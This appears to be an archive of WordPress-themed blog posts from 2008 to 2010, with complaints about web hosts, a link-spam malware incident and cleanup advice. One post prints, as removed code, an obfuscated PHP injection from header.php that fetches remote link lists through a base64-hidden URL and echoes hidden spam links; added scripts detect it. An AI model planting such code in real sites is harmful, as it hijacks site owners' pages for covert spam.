Posted August 5th, 2010, in: Ideas, Observations, Opinions, Rants Etc| Technology| WordPress
Badass. Just looked at his site and the Footer of the site says:
Copyright © 2010 Dr. Dre “Detox” – The most anticipated Hip Hop album ever. Running on WordPress | Theme developed by rsuog.
Cool. WordPress is big.
Posted June 21st, 2010, in: 1| Ideas, Observations, Opinions, Rants Etc| Technology| Videos| WordPress
From the WP Dev Blog, Matt Mullenweg giving his ‘State of the Word’ presentation. Very cool. I’m really excited about where WordPress is going.
Posted April 15th, 2010, in: Computer Problems and Fixes| Evil Robots| Ideas, Observations, Opinions, Rants Etc| Reviews & Thoughts About Products| Technology| WordPress
When I get asked for help with an attack on a WordPress site, it’s often on the same few hosting providers. And when it’s not, it’s usually a small, local hosting provider. When I have spoken to the staff of one of these hosting providers, about what seems to only occur in these few situations, they never take responsibility for having oddball server settings. And it’s not uncommon for them to actually blame their customers for using WordPress in the first place!
Some of the more popular Hosting Providers that seem to have more trouble than others with WordPress malware attacks in the past two years (in my experience) are Network Solutions and IX Web Hosting. And in general, hosting providers that have a lot of issues with malware affecting WordPress sites either:
- Have screwy server settings that tempt developers to take risks with file permissions, or
- Have vulnerabilities that allow malware to sneak from one hosting account to another
As for some of the local, ma ‘n’ pa providers I’ve had problems with, I’m not going to hit them when they’re down by naming names. But let me just say this: Buying local isn’t necessarily a good idea when it comes to hosting. It’s often the worst thing you can do. You usually get crappy support, a high price, a non-standard product, and to make things even worse, you also often get a territorial ‘server guy’ who wants to blame any technical problems on the customer and not take responsibility for anything.
I can imagine being a hosting provider and not wanting to change how I do things just because a few of my customers want to run some weird PHP software they found somewhere. But WordPress is hardly obscure anymore. And although I could be wrong, it seems that the server settings required for a smooth, safe ride with WordPress are in line with “best practices” for hosting providers in general, since all the best and most popular hosting providers seem to run WordPress perfectly.
So in the ‘news,’ I guess on April 12th, 2010, someone (rshinsec) at Network Solutions announced that an attack on many of Network Solutions’ customers’ sites was actually caused by a “WordPress Vulnerability.” (Quote is actually from a WordPress.org page HERE, because according to the WordPress.org page, Network Solutions has since edited the announcement):
“Beginning last week a WordPress vulnerability has been the target of attacks on multiple WordPress websites on hosting platforms around the web. We have a blog post with additional details about the vulnerability and how to secure your WordPress site.”
In fact, it was not a WordPress problem at all. So in response to some of the inaccurate anti-WordPress blogosphere chatter caused by Network Solutions passing the buck like this, Matt Mullenweg, founder of WordPress, posted to the WordPress Development Blog, clearing some things up, as well as putting it like this:
“Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.”
Thank you Matt! We the people that use and love WordPress need to stand up for ourselves and demand what we deserve. We are not a fringe community anymore. WordPress is mainstream software and any hosting provider that has issues with it needs to check themselves!
Posted November 3rd, 2009, in: Computer Problems and Fixes| Evil Robots| Humanity, Culture, Philosophy, Politics, Ethics Etc| Marketing/Advertising In The Cloud| SEO, SEM, SMO Etc| Technology| WordPress
The site links to sites that are also under attack, and when the bug is running correctly on those sites, the sites redirect the hits to the final destination, which is http://www.zml.com/
I don’t know if zml.com knows this is happening. I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it. I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.
The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.
The following is a list of the sites being linked thru, which I assume are all victims of this malware. If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.
Message to ZML:
Hello,
I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.
You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.
It doesn’t seem like you would want to be responsible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.
Thanks,
Andrew A. Peterson
Some samples of weird code that the bot inserted:
```xml
<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>
```
Posted October 20th, 2009, in: Computer Problems and Fixes| Ideas, Observations, Opinions, Rants Etc| Technology| WordPress
UPDATE: After about four hours of hunting, I finally found a way to enable CodePress in WordPress! A plugin called Enable Codepress does just that! It only seems to work in FireFox, but it does work with WordPress 2.8.4.
Copy of a comment I left HERE, a tutorial having to do with adding line-numbers and syntax-highlighting to WordPress’ text-editor.
Wow. I am so frustrated. I have spent the last four hours trying to find a way for me to endow my clients, whom I have set up with WordPress, with the power of line numbers when editing CSS.
WordPress is nearly FTP-free, which is great for lay persons. I’ve had great results with teaching older people how to use FireBug to find and preview changes in their CSS by right-clicking on what they want to change and selecting “inspect element.” And it’s not too difficult for many of these folks to get into their Stylesheet in WP’s Theme Editor and find and change what they have tested in FireFox.
But what would make the workflow a thousand times better would be a way to make the Textarea in the Theme Editor display Line-Numbers. There are a handful of plugins that claim to do this, but none of them seem to work with WordPress 2.8.4. And in my hunt, I’ve found evidence that WP once had this feature briefly, but turned it off because it was too slow. I never noticed it and I’ve been using WP for years, and have always been up to date.
Now I find this blog post. Great. A hack to turn on the CodePress functionality in WordPress 2.8… The problem is I don’t understand how to do this!
Can’t you just make an installable Plugin? A plugin would be great because it would be nice to be able to turn the thing on and off, if it is indeed slow or buggy.
Or if some manual intervention with WP’s files is necessary, could you please-please-please explain which files you are editing in this tutorial? All of the examples show top line numbers (1, 2, 3). There’s no “this is what the whole thing should look like” …You don’t explain what file or files you are editing. This is so annoying because I’m not a programmer and this how-to assumes that we know certain things that I don’t know.
I could brave these steps if I knew where to make them. I have been searching for this post for hours only to find that I’m not smart enough to understand the directions!!! Thanks for your consideration and for sharing information, even if I am ineligible for it.
Posted June 18th, 2009, in: Computer Problems and Fixes| Evil Robots| Technology| WordPress
Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):
```php
<?php /* wp_remote_fopen procedure */
$wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv';
$opt_id='62f751b6518fcbe2ab5980b9f1349902';
$blarr=get_option('cache_vars');
if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){
    $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt'));
    update_option('cache_vars',$blarr);
}
$blarr=unserialize(base64_decode(get_option('cache_vars')));
if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){
    if($blarr['random']){
        $new='';
        foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k];
        $blarr['links']=$new;
    }
    $txt_out='';
    foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>';
    echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']);
}
/* wp_remote_fopen procedure */ ?>
```
After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks. For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”.
Who knew that was the thing to do? I didn’t. It also scans your WP install for risky file permissions and weak passwords and a few other things.
Unfortunately for me, I was working on a site hosted by AN Hosting, which doesn’t allow certain privileges to database users (Alter?), so I had to change our table prefixes manually.
WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually.
Basically you:
- download your database thru PHPMyAdmin as per WordPress.org’s Documentation,
- do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_”
- make a new database and import your “somethingelse_” version to the new database.
- Change your wp-config.php file to point at the new database
- Change your wp-config.php file’s “table prefix” line from “$table_prefix = 'wp_'” to “$table_prefix = 'somethingelse_'”
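A narrower version of the find-and-replace step above, as an added example (not code from the tutorial or from WP Security Scan): it renames only table identifiers and the keys that carry the prefix, because a blanket replace of “wp_” also rewrites row content and breaks the byte counts inside PHP-serialized values. It assumes a mysqldump or phpMyAdmin style dump with backtick-quoted table names; the key list and the sample dump are constructed assumptions.

```python
import re

# Keys a stock WordPress install stores with the table prefix in their name.
# Assumption: this list is not exhaustive; plugins may add prefixed keys.
PREFIXED_KEYS = ("user_roles", "capabilities", "user_level")
# Statement openers after which the first backticked name is a table name.
STMT = (r"(?:/\*!\d+ )?(?:DROP TABLE(?: IF EXISTS)?|CREATE TABLE(?: IF NOT EXISTS)?"
        r"|INSERT INTO|LOCK TABLES|ALTER TABLE) ")

# Constructed sample dump (not from a real site).
SAMPLE_DUMP = """\
DROP TABLE IF EXISTS `wp_options`;
CREATE TABLE `wp_options` (`option_name` varchar(64), `option_value` longtext);
INSERT INTO `wp_options` VALUES ('wp_user_roles', 'a:0:{}');
INSERT INTO `wp_options` VALUES ('my_note', 'a:1:{s:4:"note";s:13:"see wp_posts.";}');
INSERT INTO `wp_usermeta` VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
"""

def rename_prefix(dump_sql, old="wp_", new="somethingelse_"):
    """Rename table identifiers and prefixed keys; leave row content untouched."""
    o = re.escape(old)
    table = re.compile(r"^(" + STMT + r")`" + o + r"(\w+)`", re.MULTILINE)
    out = table.sub(lambda m: m.group(1) + "`" + new + m.group(2) + "`", dump_sql)
    # Whole quoted literals only, so text inside post or option content is skipped.
    keys = re.compile(r"(?<!\\)'" + o + r"(" + "|".join(PREFIXED_KEYS) + r")'")
    return keys.sub(lambda m: "'" + new + m.group(1) + "'", out)

def serialized_lengths_ok(sql):
    """True if every PHP-serialized s:N:"..." still holds exactly N bytes."""
    return all(int(n) == len(s.encode("utf-8"))
               for n, s in re.findall(r's:(\d+):"(.*?)";', sql))

if __name__ == "__main__":
    print(rename_prefix(SAMPLE_DUMP))
```

Running `serialized_lengths_ok` on the output of a plain `replace("wp_", "somethingelse_")` returns False for this sample, which is the corruption the targeted rename avoids.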
These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.
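A scanner for the indicators visible in the header.php injection quoted earlier in this post, as an added example (not the author's code and not part of WP Security Scan). It walks every installed theme rather than only the active one, since the block was found in all of them; the theme names and sample files are constructed.

```python
import re
import tempfile
from pathlib import Path

# Indicators copied from the injected header.php block quoted in this post.
# A single hit can be legitimate code; several in one file is the pattern.
INDICATORS = {
    "marker_comment": re.compile(r"/\*\s*wp_remote_fopen procedure\s*\*/"),
    "remote_fetch_b64_url": re.compile(r"wp_remote_fopen\s*\(\s*base64_decode\s*\("),
    "cache_vars_option": re.compile(r"(?:get|update)_option\s*\(\s*['\"]cache_vars['\"]"),
    "unserialize_b64": re.compile(r"unserialize\s*\(\s*base64_decode\s*\("),
}

# Constructed samples: a trimmed copy of the quoted block, and a clean header.
SAMPLE_INFECTED = """<?php /* wp_remote_fopen procedure */
$blarr=get_option('cache_vars');
$blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt'));
$blarr=unserialize(base64_decode(get_option('cache_vars')));
/* wp_remote_fopen procedure */ ?>
<html>"""
SAMPLE_CLEAN = "<?php wp_head(); ?>\n<html>"

def scan_text(php_source):
    """Return the sorted names of the indicators found in one file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(php_source))

def scan_themes(themes_dir):
    """Scan every .php file of every installed theme, active or not."""
    root = Path(themes_dir)
    hits = {}
    for path in sorted(root.rglob("*.php")):
        found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Build a constructed three-theme tree in a temp dir and scan it."""
    themes = {"active-theme": SAMPLE_INFECTED, "inactive-theme": SAMPLE_INFECTED,
              "clean-theme": SAMPLE_CLEAN}
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in themes.items():
            (Path(tmp) / name).mkdir()
            (Path(tmp) / name / "header.php").write_text(body, encoding="utf-8")
        return scan_themes(tmp)

if __name__ == "__main__":
    for rel_path, found in demo().items():
        print(rel_path, found)
```

The quoted block also writes its payload to the `cache_vars` option, so that row in the options table is worth checking once the theme files are clean.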
Posted December 24th, 2008, in: Reviews & Thoughts About Products| Semantic Web| Technology| The Semantic Web (Giant Global Graph)| Web 2.0| Web Browsers| WordPress
Trying out Zemanta, a service for finding related resources.
They make Plugins for WordPress, TypePad and other blogging platforms, as well as extensions for both FireFox and IE.
Currently, as I’m writing this, the Zemanta plugin is only giving me a “Loading Zemanta…” message… I figured Zemanta’s database would likely have plenty of articles about Zemanta. Maybe not.
We’ll see. Very cool idea either way.
Update:
I guess the first time I loaded my WordPress Dashboard’s Editing page, Zemanta took a little while to load… Ever since it’s been super fast.
Pretty cool little Plugin.